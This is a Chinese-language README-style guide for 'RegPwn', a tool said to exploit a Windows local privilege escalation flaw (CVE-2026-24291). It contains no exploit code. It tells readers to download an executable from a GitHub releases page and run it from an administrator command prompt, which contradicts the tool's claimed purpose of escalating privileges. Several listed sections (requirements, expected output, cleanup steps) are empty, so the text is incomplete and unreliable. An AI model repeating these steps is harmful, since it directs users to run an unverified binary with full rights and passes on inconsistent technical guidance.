RegPwn 是一款旨在演示 Windows 系统上本地权限提升(LPE)漏洞利用的工具。它适用于 Windows 10、Windows 11 以及 Windows Server 版本。本指南将帮助您安全有效地在 Windows 计算机上下载、准备和运行 RegPwn。
在下载 RegPwn 之前,请确保您的系统满足以下条件:
RegPwn 是一款研究工具。它利用了跟踪为 CVE-2026-24291 的漏洞。请始终在您拥有测试权限的系统上使用它。
RegPwn 利用 Windows 中的一个安全缺陷,允许用户获取高于预期的权限。这对于测试系统安全性和验证您的系统是否存在漏洞非常有用。
该工具经测试并在上述列出的版本上确认可用。它针对 Windows 的注册表处理过程,因此需要小心执行。
要获取最新版本的 RegPwn,请访问发布页面:
点击此链接将带您进入发布页面,您可以在那里下载文件。发布页面将列出最新版本以及您需要运行的文件。
点击上方的按钮或在浏览器中打开此链接: https://github.com/tracyliving606/RegPwn/releases
在发布页面上,查找最新版本。最新的发布版本名称类似于 v1.0 或更高版本。
在该发布版本中,找到 .exe 文件或包含 RegPwn 可执行文件的 zip 压缩包。其名称可能类似于 RegPwn.exe。
点击文件名开始下载。您的浏览器可能会要求确认;请选择保留文件。
下载完成后,如果文件是压缩包(zip),请右键单击并选择“全部提取...”以将内容解压到一个新文件夹中。
记下您保存或解压 RegPwn 的文件夹位置。
运行 RegPwn 需要打开命令提示符并以管理员身份执行程序。
在 Windows 开始菜单中搜索“命令提示符”。
右键单击“命令提示符”并选择“以管理员身份运行”。这一步很重要,因为程序需要完全访问权限。
在命令提示符窗口中,使用 cd 命令切换到您保存 RegPwn 的目录。例如,如果您将其保存在 Downloads\RegPwn 中,请键入:
cd %HOMEPATH%\Downloads\RegPwn
然后按 Enter 键。
RegPwn.exe
然后按 Enter 键。
如果您遇到与权限或文件缺失相关的错误,请检查您是否以管理员身份运行,并确保所有必需的文件都在文件夹中。
当您运行 RegPwn 时,程序将尝试利用 Windows 注册表处理过程中的一个安全缺陷。它可能会显示成功或失败的提示信息。
典型输出可能显示:
在 RegPwn 完成之前,不要关闭命令提示符。过早关闭可能会导致进程未完成。
RegPwn 不需要安装。您只需删除存储可执行文件的文件夹即可将其移除。
如果您想确保没有残留更改:
如有技术问题或疑问,请使用 GitHub 仓库的问题页面:
请提供您的 Windows 版本和所遵循的步骤等详细信息。这有助于开发者理解和修复问题。
RegPwn 利用已知漏洞来测试系统安全性。请仅在您自己的机器或拥有权限的系统上使用。在未经授权的系统上运行利用工具可能会造成危害或构成违法行为。
请保持系统更新,并关注与 CVE-2026-24291 相关的供应商安全公告以获取补丁。